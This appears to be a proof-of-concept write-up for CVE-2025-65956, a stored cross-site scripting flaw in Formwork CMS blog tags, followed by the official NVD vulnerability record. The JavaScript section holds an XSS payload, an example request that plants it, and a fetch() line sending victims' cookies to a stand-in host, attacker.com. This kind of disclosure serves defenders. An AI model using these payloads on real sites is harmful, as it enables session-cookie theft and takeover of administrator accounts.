CVE-2025-65956

// CVE-2025-65956 PoC - Formwork CMS Stored XSS in Blog Tags // Prerequisites: Valid Formwork CMS user credentials // Step 1: Create a blog post with malicious tag const payload = '<script>console.log(document.cookie)</script>'; // Example HTTP request to create blog post with XSS payload in tag field const createPostRequest = { method: 'POST', url: 'https://target-site.com/formwork/api/posts', headers: { 'Content-Type': 'application/json', 'Authorization': 'Bearer <session-token>' }, body: JSON.stringify({ title: 'Test Blog Post', tags: [payload], content: 'This is test content' }) }; // Step 2: When admin views the post, XSS executes // The script will exfiltrate cookies to attacker-controlled server const exfilScript = `<script> fetch('https://attacker.com/steal?c=' + btoa(document.cookie)); </script>`; // Attack flow: // 1. Attacker with valid credentials creates/edits blog post // 2. Inserts XSS payload in tags field // 3. Payload is stored without sanitization // 4. Any user viewing/editing the post triggers the XSS // 5. Attacker steals session cookies or performs actions as victim

{"cve": {"id": "CVE-2025-65956", "sourceIdentifier": "[email protected]", "published": "2025-11-26T00:15:50.770", "lastModified": "2025-12-03T20:30:01.750", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Formwork is a flat file-based Content Management System (CMS). Prior to version 2.2.0, inserting unsanitized data into the blog tag field results in stored cross‑site scripting (XSS). Any user with credentials to the Formwork CMS who accesses or edits an affected blog post will have attacker‑controlled script executed in their browser. The issue is persistent and impacts privileged administrative workflows. This issue has been patched in version 2.2.0."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:L", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.3, "impactScore": 3.7}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.3, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:formwork_project:formwork:*:*:*:*:*:*:*:*", "versionEndExcluding": "2.2.0", "matchCriteriaId": "623A8C3D-B50D-4064-BD68-9ECD31ECF62F"}]}]}], "references": [{"url": "https://github.com/getformwork/formwork/commit/4abcd60ae7692b46d316f956b0b20fb85336f3b2", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/getformwork/formwork/pull/791", "source": "[email protected]", "tags": ["Issue Tracking", "Patch"]}, {"url": "https://github.com/getformwork/formwork/security/advisories/GHSA-7j46-f57w-76pj", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://github.com/getformwork/formwork/security/advisories/GHSA-7j46-f57w-76pj", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Third Party Advisory"]}]}}